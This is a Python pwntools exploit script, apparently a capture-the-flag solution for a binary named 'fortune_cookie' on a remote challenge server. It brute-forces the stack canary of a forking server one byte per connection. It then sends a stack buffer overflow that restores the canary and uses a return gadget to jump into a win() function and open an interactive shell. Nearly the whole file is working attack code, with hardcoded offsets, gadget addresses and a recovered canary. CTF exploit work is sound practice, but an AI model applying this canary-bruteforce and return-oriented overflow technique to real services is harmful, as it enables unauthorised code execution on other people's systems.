
#!/usr/bin/env python3
import time
from pwn import *
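HOST, PORT = "offsec.m0lecon.it", 13569
# HOST, PORT = '127.0.0.1', 4444

# Stack layout of the overflowed frame, as used by the payload below:
#   [72-byte buffer][8-byte canary][8-byte saved rbp][return address]
OFFSET_TO_CANARY = 72
OFFSET_TO_RIP = OFFSET_TO_CANARY + 8 + 8

elf = ELF("./fortune_cookie", checksec=False)

# Canary recovered on an earlier run. It is only valid while the same
# fork-server process is alive: forked children inherit the parent's canary,
# which is what makes the byte-by-byte bruteforce possible in the first place.
# After a server restart this value is stale -- set it to None to re-bruteforce.
KNOWN_CANARY = 0x4F03B0B41EBDDB00

# ROP gadgets (static addresses: the binary is loaded at 0x400000, i.e. non-PIE).
# Only `gadget2` is used; the others are alternatives kept from earlier attempts.
# gadget = 0x4013cf
gadget = 0x000000000040190D
gadget4 = 0x0000000000401016
gadget3 = 0x0000000000401438
# Presumably a bare `ret`, used to re-align the stack to 16 bytes before
# entering win() -- verify with `ROPgadget --binary ./fortune_cookie | grep 40101a`.
gadget2 = 0x40101A


def bruteforce_canary(host: str, port: int, known: bytes = b"\x00", timeout: float = 0.2) -> int:
    """Recover the stack canary one byte at a time from a fork server.

    Each probe overwrites the buffer plus the canary bytes guessed so far plus
    one candidate byte. A child that still answers "OK" confirms the candidate;
    a child killed by __stack_chk_fail (EOF / no "OK") rejects it. The lowest
    byte is started as 0x00 because glibc zeroes it to stop string functions
    from leaking the canary.

    Args:
        host, port: fork server to probe (one connection per candidate byte).
        known: canary bytes already confirmed, least-significant first.
        timeout: how long to wait for the "OK" reply. Too small for the
            network latency and correct guesses get misclassified as failures.

    Returns:
        The full 8-byte canary as an integer (little-endian).

    Raises:
        RuntimeError: if no candidate byte is accepted at some position, which
            almost always means the oracle misfired (timeout too short, or
            the server was restarted and `known` no longer matches).
    """
    for i in range(8 - len(known)):
        for bval in range(256):
            guess = known + bytes([bval])
            payload = b"A" * OFFSET_TO_CANARY + guess
            io = remote(host, port, level="error")
            try:
                io.recvuntil(b"wish\n")
                io.send(payload)
                data = io.recv(timeout=timeout)
            except EOFError:
                data = b""
            finally:
                # Close even when recvuntil() raises, otherwise ~1800 probes
                # leak sockets and the server may start refusing connections.
                io.close()
            if b"OK" in data:
                known = guess
                log.success(f"byte {i+1}: {bval:02x}")
                break
        else:
            raise RuntimeError(
                f"no canary byte accepted at position {len(known)}; "
                "check the timeout or re-run from scratch"
            )
    return u64(known)


def build_payload(canary: int) -> bytes:
    """Build the overflow: pad to the canary, restore it, skip rbp, ret-slide into win()."""
    payload = flat(
        b"A" * OFFSET_TO_CANARY,
        p64(canary),
        # saved rbp -- its value does not matter, only its size.
        b"B" * (OFFSET_TO_RIP - OFFSET_TO_CANARY - 8),
        p64(gadget2),  # alignment gadget
        p64(elf.sym.win),
    )
    # Guard against a stale offset edit silently shifting the return address.
    if len(payload) != OFFSET_TO_RIP + 16:
        raise ValueError(f"unexpected payload length {len(payload)}")
    return payload


def main() -> None:
    """Leak/reuse the canary, send the ROP payload and hand the shell to the user."""
    canary = KNOWN_CANARY
    if canary is None:
        canary = bruteforce_canary(HOST, PORT)
    log.info(f"Canary: {canary:#x}")

    # The tube's context manager closes the socket once interactive() returns.
    with remote(HOST, PORT) as io:
        io.recvuntil(b"wish\n")
        io.send(build_payload(canary))
        io.interactive()


if __name__ == "__main__":
    main()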